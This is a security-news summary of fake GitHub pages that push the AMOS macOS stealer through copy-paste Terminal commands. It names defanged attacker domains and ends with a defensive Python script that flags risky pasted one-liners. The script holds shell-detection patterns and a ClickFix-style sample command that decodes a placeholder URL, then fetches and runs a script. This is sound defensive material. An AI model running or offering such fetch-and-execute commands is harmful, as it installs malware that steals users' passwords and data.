Overview
- LastPass reported two GitHub pages created on September 16 that impersonated its Mac app, redirected to macprograms-pro[.]com with Terminal instructions, and have since been removed.
- Malwarebytes says its brand is also being faked and details a ClickFix command that decodes to gosreestr[.]com/hun/install.sh, noting the referenced files were taken down.
- Attackers use SEO and sponsored search results to elevate fraudulent repositories that impersonate more than 100 products spanning password managers, financial services, developer tools, and creative apps.
- Victims are led to paste a one‑line command that fetches an AMOS payload to /tmp, a technique that can evade Gatekeeper and XProtect and may ask for the device password to finalize installation.
- AMOS is a malware-as-a-service offering reported at about $1,000 per month, and it now includes a backdoor for persistence. Vendors are sharing IoCs and pursuing takedowns, and they warn users to avoid copy-pasted commands and to download only from official sources.
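
The bullets above describe a pasted one-line command whose download URL is only visible after decoding. The Python sketch below is an added example, not code from LastPass or Malwarebytes: it triages such a command before anyone runs it. The signal names, weights, threshold and sample commands are assumptions made for illustration, and `example.invalid` is a placeholder domain.

```python
import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # long enough to hide a URL
URL = re.compile(r"https?://[^\s'\"|;)]+")
FETCHER = re.compile(r"\b(curl|wget)\b")
# Fetched text handed to an interpreter: "| bash", "bash -c ...", "bash <(...)".
EXEC_SINK = re.compile(r"\|\s*(ba|z|da)?sh\b|\b(ba|z|da)?sh\s+(-c\b|<\()")
TMP_WRITE = re.compile(r"(-o|-O|--output|>)\s*/tmp/\S+")


def decoded_urls(command):
    """URLs that only become visible after base64-decoding tokens in the command."""
    urls = []
    for token in B64_TOKEN.findall(command):
        try:
            padded = token + "=" * (-len(token) % 4)
            text = base64.b64decode(padded).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 text, e.g. a long path or identifier
        urls.extend(URL.findall(text))
    return urls


def triage(command):
    """Score a pasted one-liner; 3 or more means do not run it without review."""
    hidden = decoded_urls(command)
    signals = {  # weights are illustrative assumptions
        "hidden_url": 2 if hidden else 0,
        "executes_fetched_text": 2 if EXEC_SINK.search(command) else 0,
        "fetches_remote": 1 if FETCHER.search(command) else 0,
        "writes_tmp": 1 if TMP_WRITE.search(command) else 0,
    }
    score = sum(signals.values())
    return {"score": score, "suspicious": score >= 3, "hidden_urls": hidden,
            "signals": [name for name, pts in signals.items() if pts]}


# Constructed samples; example.invalid is a reserved placeholder domain.
_ENC = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLES = {
    "clickfix_style": f'/bin/bash -c "$(curl -fsSL $(echo {_ENC} | base64 -d))"',
    "plain_download": "curl -fsSL https://example.invalid/tool.dmg -o /tmp/tool.dmg",
    "package_manager": "brew install --cask example-app",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, triage(cmd))
```

The threshold also flags legitimate installers that pipe a download straight into a shell, so treat a hit as a prompt to inspect the decoded URL rather than as a verdict.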